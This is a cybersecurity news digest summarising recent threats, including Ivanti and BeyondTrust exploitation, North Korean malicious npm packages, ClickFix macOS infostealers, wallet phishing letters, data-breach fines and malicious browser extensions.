Daily Brief

A single threat actor is behind 83% of recent attacks on Ivanti Endpoint Manager Mobile, exploiting critical vulnerabilities CVE-2026-21962 and CVE-2026-24061. These vulnerabilities allow unauthenticated remote code execution, posing significant risks to affected systems. Ivanti has issued hotfixes, with full patches expected in the first quarter. GreyNoise identified a single IP address, 193[.]24[.]123[.]42, responsible for the majority of exploitations, hosted on bulletproof infrastructure by PROSPERO OOO. On February 8, a spike in activity was recorded with 269 sessions, significantly above the daily average, indicating increased exploitation efforts. The attack methods include OAST-style DNS callbacks, suggesting involvement of initial access brokers. The IP address is not widely listed in public IoCs, potentially leaving defenses vulnerable. Beyond Ivanti, the same infrastructure targets additional vulnerabilities in Oracle WebLogic, GNU Inetutils Telnetd, and GLPI, indicating a broad exploitation campaign. Ivanti advises using specific RPM packages for temporary mitigation and suggests building a replacement EPMM instance for enhanced security until full patches are released.

Threat actors are sending physical letters impersonating Trezor and Ledger, urging users to submit recovery phrases, posing a significant risk to cryptocurrency wallet security. The letters claim to be official communications, pressuring users to complete "Authentication" or "Transaction" checks by scanning QR codes leading to phishing sites. Past data breaches at Trezor and Ledger may have exposed customer contact information, potentially aiding in targeting these phishing attempts. The phishing sites mimic official setup pages and trick users into entering recovery phrases, allowing attackers to gain full control over the wallets. While phishing emails are common, this method of using physical mail is relatively rare, highlighting evolving tactics in cybercrime. Users are reminded that recovery phrases should never be shared or entered on any device other than the hardware wallet itself. Both Trezor and Ledger emphasize they will never request recovery phrases, reinforcing the importance of educating users about phishing risks.

North Korean threat actors are targeting JavaScript and Python developers with fake job offers, using coding challenges to distribute malware. The campaign, named 'Graphalgo', involves creating fake companies in the blockchain and crypto-trading sectors to lure victims. Attackers use npm and PyPi registries to host malicious packages that act as downloaders for a remote access trojan (RAT). Researchers identified 192 malicious packages, with the campaign's modularity allowing quick resumption after partial compromises. The RAT can execute arbitrary commands, exfiltrate files, and targets the MetaMask cryptocurrency extension, indicating financial motives. The operation is attributed to the Lazarus group, known for its cryptocurrency-focused attacks, with evidence aligning with North Korean tactics. Developers compromised by these packages are advised to rotate tokens, change passwords, and reinstall their operating systems.

Threat actors are targeting macOS users through ClickFix campaigns, leveraging Claude artifacts and Google Ads to deliver infostealer malware. Over 10,000 users have accessed malicious content, which includes instructions to execute harmful shell commands in Terminal. Two variants of the malware have been identified, both leading to the MacSync infostealer, which exfiltrates sensitive system information. The malware communicates with a command-and-control server using a hardcoded token and API key, disguising its activity with a macOS browser user-agent. Data stolen by the malware is archived and exfiltrated to the attacker's server; failed attempts are retried multiple times to ensure data capture. Researchers from Moonlock Lab and AdGuard have linked the attacks to a single threat actor, suggesting coordinated efforts. Users are advised to be cautious of executing unfamiliar commands in Terminal and to verify the safety of commands using chatbot inquiries. This campaign indicates a growing trend of exploiting large language models for malicious purposes, expanding beyond previous ChatGPT and Grok abuses.

A critical SQL injection flaw in Microsoft Configuration Manager, CVE-2024-43468, is now being actively exploited, posing risks to unpatched businesses and government agencies. The vulnerability, rated 9.8, allows unauthenticated remote attackers to execute commands on servers and databases, necessitating immediate patching. The US Cybersecurity and Infrastructure Security Agency has added this flaw to its Known Exploited Vulnerabilities catalog, urging federal agencies to patch by March 5. Discovered by Synacktiv's Mehdi Elyassa, the flaw was initially deemed "exploitation less likely," but recent proof-of-concept exploits indicate active threats. Microsoft has not yet commented on the extent of exploitation or the number of affected customers, leaving organizations uncertain about the full impact. The urgency to address this vulnerability is heightened by recent disclosures of other exploited CVEs, with Microsoft releasing 59 new CVEs this month alone. Organizations are advised to prioritize patching this vulnerability to mitigate potential attacks and ensure system security during a period of increased cyber activity.

South Korea's Personal Information Protection Commission fined Louis Vuitton, Dior, and Tiffany $25 million for inadequate security measures leading to data breaches affecting over 5.5 million customers. The breaches exposed sensitive customer data, including names, contact details, and purchase histories, due to unauthorized access to their cloud-based customer management systems. Louis Vuitton's breach resulted from malware on an employee's device, compromising their SaaS and affecting 3.6 million customers. The company was fined $16.4 million. Dior's breach involved a phishing attack on a customer service employee, exposing data for 1.95 million customers. The company faced a $9.4 million penalty for delayed breach notification and inadequate security practices. Tiffany's breach, involving voice phishing, impacted 4,600 clients. The company was fined $1.85 million for similar security lapses and notification delays. The PIPC stressed that using SaaS solutions does not absolve companies of their responsibility to protect client data, highlighting the need for robust access controls and timely breach notifications. These incidents underline the critical importance of implementing comprehensive security measures and adhering to data protection regulations to safeguard customer information.

Google Threat Intelligence Group identified a new threat actor linked to Russian intelligence, targeting Ukrainian defense, military, and government sectors with CANFAIL malware. The actor has expanded its focus to include aerospace, nuclear, and chemical research organizations, as well as international humanitarian aid groups involved in the Ukraine conflict. Despite limited resources, the group has enhanced its capabilities using large language models for reconnaissance, social engineering, and command-and-control setup. Recent phishing campaigns involve impersonation of Ukrainian and Romanian energy organizations to compromise email accounts and distribute malware. The attack chain utilizes LLM-generated lures and Google Drive links to deliver CANFAIL, a JavaScript malware disguised as a PDF, executing a PowerShell dropper. The actor is also connected to the PhantomCaptcha campaign, which uses phishing emails to target Ukraine's war relief efforts, delivering a WebSocket-based trojan. These activities highlight ongoing cyber threats against Ukraine, emphasizing the need for robust cybersecurity measures and international cooperation.

Google Threat Intelligence Group identified state-sponsored cyber activities from China, Iran, North Korea, and Russia targeting the defense industrial base (DIB) sector. The operations focus on defense entities involved in the Russia-Ukraine conflict, exploiting hiring processes, and targeting edge devices for initial access. Hacktivist actors and state-sponsored groups show interest in autonomous vehicles and drones, reflecting their growing role in modern warfare. Chinese threat groups employ operational relay box networks for reconnaissance, complicating detection and attribution efforts against defense targets. The defense industrial base faces constant, multi-vector threats, including extortion and disruptions from financially motivated actors. Google warns of the persistent volume of intrusions and the exploitation of defense personnel as significant threats to the industry. The report underscores the need for enhanced cybersecurity measures and vigilance within the defense sector to mitigate these evolving threats.

Cisco Talos has identified a new threat actor, UAT-9921, deploying VoidLink malware against technology and financial services sectors, exploiting compromised hosts for command-and-control operations. VoidLink, a modular malware framework, is designed for stealthy, long-term access to Linux-based cloud environments, using Zig, C, and GoLang for its components. The malware includes advanced features such as kernel-level rootkits, anti-forensics, and EDR evasion, lowering the skill barrier for developing sophisticated attacks. UAT-9921 is suspected to have Chinese language proficiency, with development efforts possibly split across multiple teams, indicating a structured approach. The malware's role-based access control system suggests potential use in red team exercises, though its capabilities raise significant security concerns. VoidLink's compile-on-demand feature allows rapid adaptation to different Linux distributions, enhancing its versatility and threat potential. Observations indicate VoidLink's use dates back to September 2025, suggesting a longer operational history than initially thought.

Criminal IP, an AI-powered threat intelligence platform, is now integrated with IBM QRadar SIEM and SOAR, providing enhanced detection and response capabilities for security teams. This integration allows organizations to incorporate external, IP-based threat intelligence directly into QRadar workflows, improving the speed and accuracy of identifying malicious activities. Security teams can analyze firewall traffic logs in real-time, automatically classifying IP addresses into risk levels, aiding in prioritizing response actions. The seamless integration supports interactive investigations, enabling analysts to access detailed threat reports without leaving the QRadar environment, thus enhancing decision-making efficiency. Criminal IP's integration extends to QRadar SOAR, automating threat enrichment in incident response, reducing manual processes, and streamlining SOC operations. By combining QRadar's capabilities with Criminal IP's threat intelligence, organizations can improve detection accuracy, shorten investigation cycles, and enhance response prioritization. The integration reflects the growing importance of real-time, exposure-based intelligence in modern SOC environments, enhancing operational efficiency and detection confidence.

CISA has identified the active exploitation of a critical vulnerability in Microsoft Configuration Manager, prompting urgent patching directives for U.S. government agencies. The vulnerability, CVE-2024-43468, allows remote attackers to execute arbitrary commands with high privileges through SQL injection, posing significant risks. Initially deemed "Exploitation Less Likely" by Microsoft, the release of proof-of-concept code by Synacktiv has changed the threat landscape. Federal agencies are mandated to secure systems by March 5th, 2024, under Binding Operational Directive 22-01, highlighting the urgency of the situation. CISA advises all network defenders, including private sector entities, to implement mitigations or discontinue use if necessary, to protect against potential attacks. This situation underscores the need for continuous monitoring and timely patch application to safeguard IT infrastructure against evolving threats.

Odido, a leading Dutch telecom provider, disclosed a breach affecting 6.2 million customers, compromising personal data but not passwords or call details. Exposed information includes names, addresses, phone numbers, email addresses, dates of birth, bank account numbers, and ID document details. The breach was detected over the weekend of February 7-8, prompting immediate notification to the Dutch Data Protection Authority. Odido has begun notifying affected customers via email and SMS, providing personalized details on the data compromised and offering guidance on potential scams. The company warns that stolen data could be used for impersonation scams, urging customers to verify caller identities and be cautious of fraudulent invoices. CEO Søren Abildgaard confirmed operational services remain unaffected and emphasized the company's commitment to mitigating the breach's impact. Odido has enlisted external cybersecurity experts to bolster security measures and prevent future incidents.

Cybersecurity researchers identified malicious Chrome extensions designed to steal data from Meta Business Suite and Facebook Business Manager, affecting 33 users with the potential for broader impact. The extension, CL Suite by @CLMasters, exfiltrates TOTP codes and business analytics to a threat actor's infrastructure, posing a risk of unauthorized account access. Another campaign, VK Styles, hijacked 500,000 VKontakte accounts, using extensions to manipulate user settings and engage in persistent account control. AiFrame, a separate operation, involves 32 AI-themed extensions that siphon sensitive data from over 260,000 users, including Gmail content and browsing activity. A report reveals 287 Chrome extensions exfiltrating browsing history to data brokers, affecting 37.4 million installations, highlighting the widespread abuse of browser extensions. Users and organizations are advised to install only necessary, well-reviewed extensions, regularly audit for malicious behavior, and use separate browser profiles for sensitive activities. These incidents underscore the need for vigilance in managing browser extensions, as they can serve as conduits for significant data breaches and unauthorized access.

npm has revamped its authentication process to combat supply-chain attacks, following incidents like Sha1-Hulud, by replacing long-lived tokens with short-lived, identity-bound credentials. Despite improvements, npm remains vulnerable to attacks, as MFA on publishing remains optional, allowing potential bypass and exploitation by attackers. Recent attacks, including those on ChalkJS, highlight the risks of MFA phishing, where attackers trick maintainers into sharing login credentials and one-time passwords. The introduction of short-lived tokens aims to enhance security, but the persistence of MFA bypass for automation continues to pose a significant risk. Chainguard's approach of building npm packages from verifiable upstream source code could significantly reduce the attack surface, as 98.5% of malicious packages were not present in the source code. Adoption of Chainguard Libraries for JavaScript and layered security measures, like MFA, could strengthen defenses against supply-chain threats. Companies are encouraged to adopt a multi-layered security strategy, combining npm's new practices with additional tools and protocols to mitigate ongoing risks.

Threat actors have begun exploiting CVE-2026-1731, a critical vulnerability in BeyondTrust products, allowing unauthorized remote code execution and potential data breaches. The flaw in BeyondTrust Remote Support and Privileged Remote Access products can lead to unauthorized access, data exfiltration, and service disruptions if left unpatched. Exploitation involves attackers extracting the x-ns-company value via get_portal_info, then establishing a WebSocket channel for further attacks. BeyondTrust has released patches to address the vulnerability, emphasizing the need for immediate updates to protect against exploitation. The rapid weaponization of this vulnerability demonstrates the shrinking window for defenders to respond and patch critical systems. CISA has added this vulnerability to its Known Exploited Vulnerabilities catalog, highlighting its active exploitation and urging swift remediation. The situation underscores the importance of timely patch management and monitoring to mitigate risks associated with newly disclosed vulnerabilities.